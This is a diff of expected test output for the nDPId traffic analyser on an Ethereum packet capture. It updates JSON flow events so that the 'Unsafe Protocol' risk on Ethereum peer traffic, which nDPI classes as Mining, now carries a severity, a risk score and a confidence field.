 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcflcAAEARfx\/AqAG4Etunn3Zfdl8AiGnBB7Pc5ZlsDZTbUrqaaoRxeL1l7Crbcxf\/BOXFZNGdyZsOxpmBlW67u9+KWe59CkWnKw2GIsEnEKk87oxTf3me3BvKcrMQD0jXMXlBXiHkLViPnwRaOVxyx4odh7D\/BO97AAHdBMuEfwAAAYJ2X4J2X8mEEtunn4J2X4CEXhYgYQU="}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365194,"flow_last_seen":1578508365194,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365194,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1578508365194,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365194,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGkX3AqAG4ynAcat1Pdl84sWAlAAAAALAC\/\/\/nsAAAAgQFtAEDAwUBAQgKItiWswAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1578508365201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365201,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGTYGwCYjRwKgBuHZf3UxCOLg9KLlL3KAScSB8NwAAAgQFrAQCCAqsVDbiItiWngEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1578508365202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365202,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGP4nAqAG4sAmI0d1Mdl8ouUvcQji4PoAQECwL1AAAAQEICiLYlrqsVDbi"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1017,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365169,"flow_last_seen":1578508365203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1578508365203,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1017,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365169,"flow_last_seen":1578508365203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1578508365203,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1578508365210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365210,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGY+sj5PqMwKgBuHZf3UovaHbWeTxErqASbgBmbgAAAgQFjAQCCAqaQodaItiWjwEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1578508365210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365210,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGWfPAqAG4I+T6jN1Kdl95PESuL2h214AQECjytwAAAQEICiLYlsKaQoda"}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365153,"flow_last_seen":1578508365212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1578508365212,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365153,"flow_last_seen":1578508365212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1578508365212,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365223,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGxFFV1mw0wKgBuHZf3U5vpmVtv4fCo6ASOJBjegAAAgQFrAQCCApls11ZItiWsAEDAwc="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1578508365223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365223,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtlnAqAG4VdZsNN1Odl+\/h8Kjb6ZlboAQECy6hQAAAQEICiLYls1ls11Z"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365189,"flow_last_seen":1578508365225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1578508365225,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365189,"flow_last_seen":1578508365225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1578508365225,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365226,"flow_last_seen":1578508365226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365226,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1578508365226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365226,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQk7AqAG4ikurvt1Rdl8erUWUAAAAALAC\/\/\/M9wAAAgQFtAEDAwUBAQgKItiW0AAAAAAEAgAA"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365239,"flow_last_seen":1578508365239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365239,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -244,50 +244,50 @@
 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1578508365315,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"ts_msec":1578508365315,"pkt":"KDc3AG3IEBMx8Tl2CABFAACcmwpAACMRP2wS26efwKgBuHZfdl8AiLphceZOwZGufNXFAvXWI774ooc6PkwC6kxvzCm0BhiTs\/TWig3gE4P3+Y0lY\/Fll4rTUKnacLSuqKdSUAk7eTbz218E2dS8j3sLMJigll9ziTSt7jKgE6R7GxELpoJhO+ReAQHdBMuEEtunn4J2X4J2X8mETxbOvYLp94CEXhYgYQo="}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1578508365408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1578508365408,"pkt":"KDc3AG3IEBMx8Tl2CABFAACdhY9AAC4RWjq3gfKkwKgBuAQAdl8AiS5Y3VkKujBE9K5giYMoNotbt65xxd7ko3VSXKgTCSaupxKnp71rmT0XRsX6xoF5macEurqmdfib0\/9m0ybRIVy\/Qzz+\/\/zwyKtEHKyC9Xjjwvc8TLpzNetXjDWFS0pbC\/Z0AQHeBcuErBRsfYJ2X4J2X8uETxbOvYLp94J2X4ReFiBh"}
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1578508365409,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"ts_msec":1578508365409,"pkt":"EBMx8Tl2KDc3AG3ICABFAACy8oAAAEARGzTAqAG4t4HypHZfBAAAnqbvG70JBv5PXjvCBbR1Rp7tYoTQJi2jMUD7JOn6eWv9REwRmFSXtYoHsvszWP\/amLZkv0asbrMZoJOaxU2yggG3KzVpk0IKmRZiX\/KGqSOqaOPD2NnZ\/WIPpNjQN9gDidCOAQLzy4S3gfKkggQAgnZfoN1ZCrowRPSuYImDKDaLW7euccXe5KN1UlyoEwkmrqcShF4WIGEF"}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1578508365409,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"ts_msec":1578508365409,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc4fIAAEARK9jAqAG4t4HypHZfBAAAiACVOpGBWjTeJor2OHTFdIkJfHanNwusT7Z+X6ZhMccUpEYH1blVudB+7Lhiy59WZ4RAivu0dgr\/6z5c18c2wNa0j2NMO4UV7uXk8QqS8l0iv7COflKJEb7GBR6jLr1IE7ZSAQHdBMuEfwAAAYJ2X4J2X8mEt4HypIIEAICEXhYgYQU="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1578508365411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365411,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGPK8zoRcMwKgBuHZf3VQuhVQAV1cO0KAScSARYwAAAgQFrAQCCAo+6INOItiW9wEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1578508365411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365411,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLbfAqAG4M6EXDN1Udl9XVw7QLoVUAYAQECygnAAAAQEICiLYl3Y+6INO"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1320,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365271,"flow_last_seen":1578508365413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":573,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1578508365413,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1320,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365271,"flow_last_seen":1578508365413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":573,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1578508365413,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1578508365419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365419,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGUh6d5phXwKgBuHZf3VIVkuQhTk9as6AScSDAlwAAAgQFrAQCCAq827CpItiW2wEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1578508365419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365419,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQibAqAG4neaYV91Sdl9OT1qzFZLkIoAQECxPsAAAAQEICiLYl3u827Cp"}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365239,"flow_last_seen":1578508365420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":145,"midstream":0,"ts_msec":1578508365420,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365239,"flow_last_seen":1578508365420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":145,"midstream":0,"ts_msec":1578508365420,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1578508365458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365458,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwG2AY0CYBEwKgBuHZf3VXR7JfX7e3rXKASaN9TlwAAAgQFrAQCCAqDIEEYItiW\/gEDAwc="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1578508365458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365458,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxBbAqAG4NAmARN1Vdl\/t7etc0eyX2IAQECzabQAAAQEICiLYl5+DIEEY"}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1341,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365279,"flow_last_seen":1578508365460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1578508365460,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","ndpi": {"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Mining"}}
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1341,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365279,"flow_last_seen":1578508365460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1578508365460,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1578508365461,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"ts_msec":1578508365461,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcQtMAAEARjkPAqAG4ynAcanZfdl8AiDkPCEixaJX\/9thQC0r9cGcsCeen+iETb10JXBU9BZQL28M1nK8vCE6bMd2SC2XGliMqSbi8oqYHUjyrBa753h2KySNTFNso18+nMzMVWvdibnHX4lluxe+\/vRPiYB2kYX3uAAHdBMuEfwAAAYJ2X4J2X8mEynAcaoJ2X4CEXhYgYQU="}
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
